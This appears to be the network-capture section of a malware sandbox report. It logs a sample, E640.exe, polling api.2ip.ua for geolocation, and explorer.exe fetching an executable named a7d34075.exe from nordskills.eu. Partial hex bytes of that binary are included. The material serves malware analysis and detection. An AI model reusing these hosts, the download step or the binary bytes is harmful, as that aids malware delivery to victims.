2023-07-27 18:19:36 UTC	952	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49851	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:40 UTC	953	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:40 UTC	953	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:40 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:40 UTC	953	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49852	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:41 UTC	954	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:41 UTC	954	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:41 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:41 UTC	954	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49860	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:41 UTC	955	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:41 UTC	955	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:41 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:41 UTC	955	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49896	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:49 UTC	956	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:49 UTC	956	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:49 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:49 UTC	957	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49687	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:18:51 UTC	2	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:18:51 UTC	2	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:18:51 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:18:51 UTC	2	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49691	213.6.54.58	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:18:58 UTC	3	OUT	GET /tmp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: nordskills.eu
2023-07-27 18:18:58 UTC	3	IN	HTTP/1.1 200 OK Date: Thu, 27 Jul 2023 18:18:58 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=a7d34075.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-07-27 18:18:58 UTC	3	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 17 17 58 88 76 79 0b 88 76 79 0b 88 76 79 0b e7 00 e7 0b 9e 76 79 0b e7 00 d2 0b af 76 79 0b e7 00 d3 0b fc 76 79 0b 81 0e ea 0b 81 76 79 0b 88 76 78 0b 1b 76 79 0b e7 00 d6 0b 89 76 79 0b e7 00 e3 0b 89 76 79 0b e7 00 e4 0b 89 76 79 0b 52 69 63 68 88 76 79 0b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba df e7 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$XvyvyvyvyvyvyvyvxvyvyvyvyRichvyPELb
2023-07-27 18:18:58 UTC	11	IN	Data Raw: 6f 78 57 00 55 00 53 00 45 00 52 00 33 00 32 00 2e 00 44 00 4c 00 4c 00 00 00 00 00 20 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 27 00 00 00 20 43 6c 61 73 73 20 48 69 65 72 61 72 63 68 79 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 41 72 72 61 79 27 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 00 20 54 79 70 65 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 60 6c 6f 63 61 6c 20 73 74 61 74 69 63 20 74 68 72 65 61 64 20 67 75 61 72 64 27 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 Data Ascii: oxWUSER32.DLL Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vector vbase copy construc
2023-07-27 18:18:58 UTC	11	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	11	IN	Data Raw: 32 30 30 30 0d 0a 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75 72 65 27 00 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 20 63 6c 6f 73 75 72 65 27 00 00 60 6f 6d 6e 69 Data Ascii: 2000 initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vector destructor iterator'`managed vector constructor iterator'`placement delete[] closure'`placement delete closure'`omni
2023-07-27 18:18:58 UTC	19	IN	Data Raw: e5 13 00 00 59 c3 Data Ascii: Y
2023-07-27 18:18:58 UTC	19	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	19	IN	Data Raw: 32 30 30 30 0d 0a 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 95 1b 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 19 11 00 00 85 c0 74 0a e8 10 11 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 53 8b 5d 08 83 fb e0 77 6f 56 57 83 3d f4 c4 43 00 00 75 18 e8 93 20 00 00 6a 1e e8 dd 1e 00 00 68 ff 00 00 00 e8 ed 1b 00 00 59 59 85 db 74 04 8b c3 eb 03 33 c0 40 50 6a 00 ff 35 f4 c4 43 00 ff 15 70 11 40 00 8b f8 85 ff 75 26 6a 0c 5e 39 05 64 cb 43 00 74 0d 53 e8 97 20 00 00 59 85 c0 75 a9 eb 07 e8 98 10 00 00 89 30 e8 91 10 00 00 89 30 8b c7 5f 5e eb 14 53 e8 76 20 00 00 59 e8 7d 10 00 00 c7 00 0c 00 00 00 33 c0 5b 5d c3 6a 08 68 b0 6f 42 00 e8 e0 18 00 00 33 c0 8b 75 08 33 db 3b f3 0f 95 c0 3b c3 75 16 e8 51 10 00 00 c7 00 16 00 Data Ascii: 2000UQeVEPuuu9EttM^US]woVW=Cu jhYYt3@Pj5Cp@u&j^9dCtS Yu00_^Sv Y}3[]jhoB3u3;;uQ
2023-07-27 18:18:58 UTC	27	IN	Data Raw: c4 0c 85 c0 74 0c Data Ascii: t
2023-07-27 18:18:58 UTC	27	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	27	IN	Data Raw: 32 30 30 30 0d 0a 33 c0 50 50 50 50 50 e8 49 f9 ff ff 56 e8 69 5d 00 00 40 59 83 f8 3c 76 2a 56 e8 5c 5d 00 00 8d 04 45 f4 c4 43 00 8b c8 2b ce 6a 03 d1 f9 68 4c 1d 40 00 2b d9 53 50 e8 72 5c 00 00 83 c4 14 85 c0 75 bd 68 44 1d 40 00 be 14 03 00 00 56 57 e8 e5 5b 00 00 83 c4 0c 85 c0 75 a5 ff b5 04 fe ff ff 56 57 e8 d1 5b 00 00 83 c4 0c 85 c0 75 91 68 10 20 01 00 68 f8 1c 40 00 57 e8 4e 5a 00 00 83 c4 0c eb 5e 53 53 53 53 53 e9 79 ff ff ff 6a f4 ff 15 8c 11 40 00 8b f0 3b f3 74 46 83 fe ff 74 41 33 c0 8a 0c 47 88 8c 05 08 fe ff ff 66 39 1c 47 74 08 40 3d f4 01 00 00 72 e8 53 8d 85 04 fe ff ff 50 8d 85 08 fe ff ff 50 88 5d fb e8 1e f1 ff ff 59 50 8d 85 08 fe ff ff 50 56 ff 15 ac 11 40 00 8b 4d fc 5f 5e 33 cd 5b e8 f2 eb ff ff c9 c3 6a 03 e8 01 5d 00 00 59 Data Ascii: 20003PPPPPIVi]@Y<v*V\]EC+jhL@+SPr\uhD@VW[uVW[uh h@WNZ^SSSSSyj@;tFtA3Gf9Gt@=rSPP]YPPV@M_^3[j]Y
2023-07-27 18:18:58 UTC	35	IN	Data Raw: 00 e8 ca be ff ff Data Ascii:
2023-07-27 18:18:58 UTC	35	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	35	IN	Data Raw: 32 30 30 30 0d 0a 83 25 10 c5 43 00 00 83 c8 ff eb e4 33 c0 50 50 50 50 50 e8 3d d9 ff ff cc 8b ff 55 8b ec 51 8b 4d 10 53 33 c0 56 89 07 8b f2 8b 55 0c c7 01 01 00 00 00 39 45 08 74 09 8b 5d 08 83 45 08 04 89 13 89 45 fc 80 3e 22 75 10 33 c0 39 45 fc b3 22 0f 94 c0 46 89 45 fc eb 3c ff 07 85 d2 74 08 8a 06 88 02 42 89 55 0c 8a 1e 0f b6 c3 50 46 e8 0a 47 00 00 59 85 c0 74 13 ff 07 83 7d 0c 00 74 0a 8b 4d 0c 8a 06 ff 45 0c 88 01 46 8b 55 0c 8b 4d 10 84 db 74 32 83 7d fc 00 75 a9 80 fb 20 74 05 80 fb 09 75 9f 85 d2 74 04 c6 42 ff 00 83 65 fc 00 80 3e 00 0f 84 e9 00 00 00 8a 06 3c 20 74 04 3c 09 75 06 46 eb f3 4e eb e3 80 3e 00 0f 84 d0 00 00 00 83 7d 08 00 74 09 8b 45 08 83 45 08 04 89 10 ff 01 33 db 43 33 c9 eb 02 46 41 80 3e 5c 74 f9 80 3e 22 75 26 f6 c1 Data Ascii: 2000%C3PPPPP=UQMS3VU9Et]EE>"u39E"FE<tBUPFGYt}tMEFUMt2}u tutBe>< t<uFN>}tEE3C3FA>\t>"u&
2023-07-27 18:18:58 UTC	43	IN	Data Raw: 15 60 11 40 00 5d Data Ascii: `@]
2023-07-27 18:18:58 UTC	44	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	44	IN	Data Raw: 32 30 30 30 0d 0a c3 6a 0c 68 c8 72 42 00 e8 b3 b9 ff ff 33 ff 47 89 7d e4 33 db 39 1d f4 c4 43 00 75 18 e8 cf c0 ff ff 6a 1e e8 19 bf ff ff 68 ff 00 00 00 e8 29 bc ff ff 59 59 8b 75 08 8d 34 f5 20 98 42 00 39 1e 74 04 8b c7 eb 6d 6a 18 e8 c7 d5 ff ff 59 8b f8 3b fb 75 0f e8 ec b0 ff ff c7 00 0c 00 00 00 33 c0 eb 50 6a 0a e8 58 00 00 00 59 89 5d fc 39 1e 75 2b 68 a0 0f 00 00 57 ff 15 90 11 40 00 85 c0 75 17 57 e8 41 9e ff ff 59 e8 b7 b0 ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 26 9e ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 4c b9 ff ff c3 6a 0a e8 29 ff ff ff 59 c3 8b ff 55 8b ec 8b 45 08 56 8d 34 c5 20 98 42 00 83 3e 00 75 13 50 e8 23 ff ff ff 59 85 c0 75 08 6a 11 e8 14 be ff ff 59 ff 36 ff 15 5c 11 40 00 5e 5d c3 2d a4 03 Data Ascii: 2000jhrB3G}39Cujh)YYu4 B9tmjY;u3PjXY]9u+hW@uWAY]>W&YEELj)YUEV4 B>uP#YujY6\@^]-
2023-07-27 18:18:58 UTC	52	IN	Data Raw: 5d 08 83 fb fe 75 Data Ascii: ]u
2023-07-27 18:18:58 UTC	52	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	52	IN	Data Raw: 32 30 30 30 0d 0a 13 e8 40 91 ff ff c7 00 09 00 00 00 83 c8 ff e9 a1 00 00 00 85 db 78 08 3b 1d 64 08 2e 02 72 12 e8 21 91 ff ff c7 00 09 00 00 00 e8 77 99 ff ff eb da 8b c3 c1 f8 05 8d 3c 85 80 08 2e 02 8b f3 83 e6 1f c1 e6 06 8b 07 0f be 44 06 04 83 e0 01 74 ce 53 e8 cf fe ff ff 59 83 65 fc 00 8b 07 f6 44 06 04 01 74 31 53 e8 52 fe ff ff 59 50 ff 15 48 11 40 00 85 c0 75 0b ff 15 b0 10 40 00 89 45 e4 eb 04 83 65 e4 00 83 7d e4 00 74 19 e8 c7 90 ff ff 8b 4d e4 89 08 e8 aa 90 ff ff c7 00 09 00 00 00 83 4d e4 ff c7 45 fc fe ff ff ff e8 0c 00 00 00 8b 45 e4 e8 4b 99 ff ff c3 8b 5d 08 53 e8 02 ff ff ff 59 c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 64 a3 ff ff 8b 45 f0 83 b8 ac 00 00 00 01 7e 13 8d 45 f0 50 6a 04 ff 75 08 e8 7f 05 00 00 83 c4 0c eb 10 8b Data Ascii: 2000@x;d.r!w<.DtSYeDt1SRYPH@u@Ee}tMMEEK]SYUuMdE~EPju
2023-07-27 18:18:58 UTC	60	IN	Data Raw: 83 a4 24 80 00 00 Data Ascii: $
2023-07-27 18:18:58 UTC	60	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	60	IN	Data Raw: 31 66 66 38 0d 0a 00 fe 89 6c 24 7c c7 44 24 40 4c 33 40 00 c7 84 24 dc 30 00 00 01 00 00 00 8b 44 24 78 8b d8 3b c5 74 4b 8b 38 3b fd 74 3c 55 8d 4c 24 18 e8 00 59 ff ff 8b 47 04 3b c5 76 09 83 f8 ff 73 04 48 89 47 04 8b 77 04 f7 de 1b f6 f7 d6 8d 4c 24 14 23 f7 e8 04 59 ff ff 3b f5 74 0a 8b 16 8b 02 6a 01 8b ce ff d0 53 e8 dc 63 ff ff 83 c4 04 8d 4c 24 44 c7 84 24 dc 30 00 00 ff ff ff ff e8 0a 59 ff ff b8 d1 05 00 00 01 05 34 08 2e 02 8b 0d 34 08 2e 02 51 6a 00 ff 15 e8 10 40 00 8b 35 c4 10 40 00 8b 3d ec 10 40 00 8b 2d a0 10 40 00 8b 1d a8 10 40 00 a3 dc 67 2d 02 a1 34 08 2e 02 c7 44 24 14 ab 82 96 00 83 f8 03 75 11 6a 00 6a 00 6a 00 ff 15 1c 10 40 00 a1 34 08 2e 02 3d df 00 00 00 0f 85 ca 01 00 00 33 d2 8d 8c 24 a0 00 00 00 51 52 52 8d 84 24 dc 00 00 Data Ascii: 1ff8l$\|D$@L3@$0D$x;tK8;t<UL$YG;vsHGwL$#Y;tjScL$D$0Y4.4.Qj@5@=@-@@g-4.D$ujjj@4.=3$QRR$
2023-07-27 18:18:58 UTC	68	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:18:58 UTC	68	IN	Data Raw: 7d e0 03 89 75 d8 7c d3 8b f0 6a 02 c1 e6 02 8d 4d f8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 8b 35 98 bf 43 00 4e 8d 46 01 99 83 e2 1f 03 c2 c1 f8 05 8d 56 01 81 e2 1f 00 00 80 89 45 d0 79 05 4a 83 ca e0 42 6a 1f 59 2b ca 33 d2 42 d3 e2 8d 5c 85 f0 89 4d d4 85 13 0f 84 82 00 00 00 83 ca ff d3 e2 f7 d2 85 54 85 f0 eb 05 83 7c 85 f0 00 75 08 40 83 f8 03 7c f3 eb 66 8b c6 99 6a 1f 59 23 d1 03 c2 c1 f8 05 81 e6 1f 00 00 80 79 05 4e 83 ce e0 46 83 65 d8 00 33 d2 2b ce 42 d3 e2 8d 4c 85 f0 8b 31 8d 3c 16 3b fe 72 04 3b fa 73 07 c7 45 d8 01 00 00 00 89 39 8b 4d d8 eb 1f 85 c9 74 1e 8d 4c 85 f0 8b 11 8d 72 01 33 ff 3b f2 72 05 83 fe 01 73 03 33 ff 47 89 31 8b cf 48 79 de 8b 4d d4 83 c8 ff d3 e0 21 03 8b 45 d0 40 83 f8 03 7d Data Ascii: }u\|jMZ+;\|1tdJy5CNFVEyJBjY+3B\MT\|u@\|fjY#yNFe3+BL1<;r;sE9MtLr3;rs3G1HyM!E@}
2023-07-27 18:18:58 UTC	76	IN	Data Raw: 0d 0a Data Ascii:
